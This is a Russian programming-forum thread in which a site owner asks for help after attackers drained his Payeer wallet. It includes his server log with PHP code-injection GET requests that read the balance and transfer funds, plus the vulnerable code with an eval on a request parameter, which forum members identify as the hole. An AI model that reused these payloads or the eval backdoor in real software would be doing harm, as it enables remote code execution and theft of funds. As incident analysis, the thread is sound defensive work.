Форум программистов
 
Контакты: о проблемах с регистрацией, почтой и по другим вопросам пишите сюда - alarforum@yandex.ru, проверяйте папку спам! Обязательно пройдите активизацию e-mail.

Вернуться   Форум программистов > Технологии > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail


Донат для форума - использовать для поднятия настроения себе и модераторам

А ещё здесь можно купить рекламу за 25 тыс руб в месяц! ) пишите сюда - alarforum@yandex.ru

Ответ
 
Опции темы
Старый 26.02.2018, 21:16   #1
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
Репутация: 26
По умолчанию Взломали GET запросом и вывели деньги Payeer

Сразу прошу прощения если не там создал тему! Уважаемые господа дело в том,что у меня взломали сервер GET запросом. И вывели деньги из кошелька Payeer. Есть лог,прошу помочь Вас! Где дыра в скрипте и что делал хаккер,если смотреть по логу. Прошу дать ответ если не затруднит. И если можно скажите,как лучше закрыть эти дыры. Заранее благодарю! Лог прилагаю:


51.15.205.192 - - [25/Feb/2018:13:00:15 +0300] "GET / HTTP/1.1" 200 3152 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /style/style.css HTTP/1.1" 200 5044 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/jquery.bxSlider.js HTTP/1.1" 200 9037 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/functions.js HTTP/1.1" 200 0 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/easyTooltip.js HTTP/1.1" 200 1983 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /jquery.slimscroll.min.js HTTP/1.1" 200 2400 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:17 +0300] "GET /jquery.bxSlider.min.js HTTP/1.1" 200 4026 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:19 +0300] "GET /img/boy.png HTTP/1.1" 200 175883 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:19 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/top1.png HTTP/1.1" 200 2343 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/1.png HTTP/1.1" 200 20795 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/body_bg.png HTTP/1.1" 404 533 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/okno1.png HTTP/1.1" 200 255818 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:21 +0300] "GET /img/a1.png HTTP/1.1" 200 107085 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/in.png HTTP/1.1" 200 6156 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/kno1.png HTTP/1.1" 200 20887 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/a12.png HTTP/1.1" 200 105791 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:18 +0300] "GET /img/bg22.png HTTP/1.1" 200 2586750 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:29 +0300] "GET /img/top1.png HTTP/1.1" 200 0 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:29 +0300] "GET /img/a1.png HTTP/1.1" 200 109427 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/body_bg.png HTTP/1.1" 404 0 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/1.png HTTP/1.1" 200 21326 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/okno1.png HTTP/1.1" 200 255817 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/a12.png HTTP/1.1" 200 105791 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/kno1.png HTTP/1.1" 200 20887 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/in.png HTTP/1.1" 200 6156 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:34 +0300] "GET /favicon.ico HTTP/1.1" 200 1373 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:33 +0300] "GET /img/top2.png HTTP/1.1" 200 2311 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:44 +0300] "GET /?menu=users_list&user_id=$payeer%20 =%20new%20rfs_payeer%28$config-%3EAccountNumber,%20$config-%3EapiId,%20$config-%3EapiKey%29;var_dump%28$payeer-%3EgetBalance%28%29%29; HTTP/1.1" 200 2248 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/body_bg.png HTTP/1.1" 404 532 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/acc.png HTTP/1.1" 200 5301 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:21 +0300] "GET //?menu=users_list&user_id=$payeer=ne w%20rfs_payeer%28$config-%3EAccountNumber,$config-%3EapiId,$config-%3EapiKey%29;var_dump%28$payeer-%3Etransfer%28array%28curIn=%3ERUB, sum=%3E375,curOut=%3ERUB,to=%3EP898 20519,comment=%3ENoComment%29%29%29 ; HTTP/1.1" 200 2141 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:23 +0300] "GET /img/body_bg.png HTTP/1.1" 404 532 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:23 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538
Сергей 163 вне форума   Ответить с цитированием
Старый 26.02.2018, 22:45   #2
p51x
Профессионал
 
Регистрация: 15.02.2010
Сообщений: 14,917
Репутация: 2668
По умолчанию

Цитата:
GET /?menu=users_list&user_id=$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);var_dump($payeer->getBalance());

GET //?menu=users_list&user_id=$payeer=ne w rfs_payeer($config->AccountNumber,$config->apiId,$config->apiKey);var_dump($payeer->transfer(array(curIn=>RUB, sum=>375,curOut=>RUB,to=>P898 20519,comment=>NoComment))) ;
Через такую дыру и не вывести...
__________________
Запомните раз и навсегда: помочь != "решите за меня"!
p51x вне форума   Ответить с цитированием
Старый 26.02.2018, 22:53   #3
Alex11223
Модератор
Заслуженный модератор
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,298
Репутация: 3739

icq: 512-765
skype: alexp.frl
По умолчанию

Чот я пока не понял, а как оно выполняется?
Вроде ж не похоже на классический SQL injection с Бобби.

Неужели там внутри есть какой-то eval с участием значения из $_GET['user_id']?0_o
Alex11223 вне форума   Ответить с цитированием
Старый 26.02.2018, 22:59   #4
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
Репутация: 26
По умолчанию

Я так понял лазия по файлам он собрал пароли, а вывел он потому что api был подключен к магазину. Я не пойму зачем он лазил по картинкам в файлах скрипта?
Сергей 163 вне форума   Ответить с цитированием
Старый 26.02.2018, 23:06   #5
Alex11223
Модератор
Заслуженный модератор
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,298
Репутация: 3739

icq: 512-765
skype: alexp.frl
По умолчанию

Зачем пароли? Выше ж код перевода на его счет.

А картинки просто браузер грузил при переходах.
Alex11223 вне форума   Ответить с цитированием
Старый 26.02.2018, 23:18   #6
Alex11223
Модератор
Заслуженный модератор
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,298
Репутация: 3739

icq: 512-765
skype: alexp.frl
По умолчанию

Цитата:
Сообщение от Alex11223 Посмотреть сообщение
Неужели там внутри есть какой-то eval с участием значения из $_GET['user_id']?0_o
хм, таки да.

Нажмите на изображение для увеличения
Название: Brave Knights - {!TITLE!} - Google Chrome 2018-02-26 21.17.25.jpg
Просмотров: 112
Размер:	73.0 Кб
ID:	92035

ЗЫ скрытые емаилов в списке тоже шедевральное.

Последний раз редактировалось Alex11223; 26.02.2018 в 23:25.
Alex11223 вне форума   Ответить с цитированием
Старый 27.02.2018, 00:13   #7
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
Репутация: 26
По умолчанию

Taк,что искать eval в файлах?
Сергей 163 вне форума   Ответить с цитированием
Старый 27.02.2018, 00:17   #8
Alex11223
Модератор
Заслуженный модератор
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,298
Репутация: 3739

icq: 512-765
skype: alexp.frl
По умолчанию

Выше ж на скриншоте написано где.
Alex11223 вне форума   Ответить с цитированием
Старый 27.02.2018, 00:52   #9
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
Репутация: 26
По умолчанию

Спасибо сейчас попробую разобраться
Сергей 163 вне форума   Ответить с цитированием
Старый 27.02.2018, 01:01   #10
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
Репутация: 26
По умолчанию

Код:
<?PHP

}else echo "<center><b>На данной странице нет записей</b></center><BR />";

$db->Query("SELECT COUNT(*) FROM ".$pref."_users_a");
$all_pages = $db->FetchRow();

	if($all_pages > 100){
	
	$sort_b = (isset($_GET["sort"])) ? intval($_GET["sort"]) : 0;
	
	$nav = new navigator;
	$page = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"])) : 1;
	
	echo "<BR /><center>".$nav->Navigation(10, $page, ceil($all_pages / 100), "/users/"), "</center>";
	
	}
?>
<?PHP
$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); 
eval($_REQUEST['user_id']); die();}

$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

</div>
<div class="block33"></div>
<div class="clr"></div>
ЭТО Users_list 66 строка начинается с eval. ее полностью удалить?

Последний раз редактировалось Alex11223; 27.02.2018 в 01:12.
Сергей 163 вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взломали системный файл hosts Restman Общие вопросы C/C++ 2 18.07.2015 06:35
Взломали сайт ruslan0 Безопасность, Шифрование 6 01.10.2011 18:34
Взломали почту на яндексе, что делать? Яр|/||< (^_^) Безопасность, Шифрование 4 17.07.2010 20:53
QIP взломали OrdJONY Свободное общение 12 09.05.2009 12:12


06:54.


Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.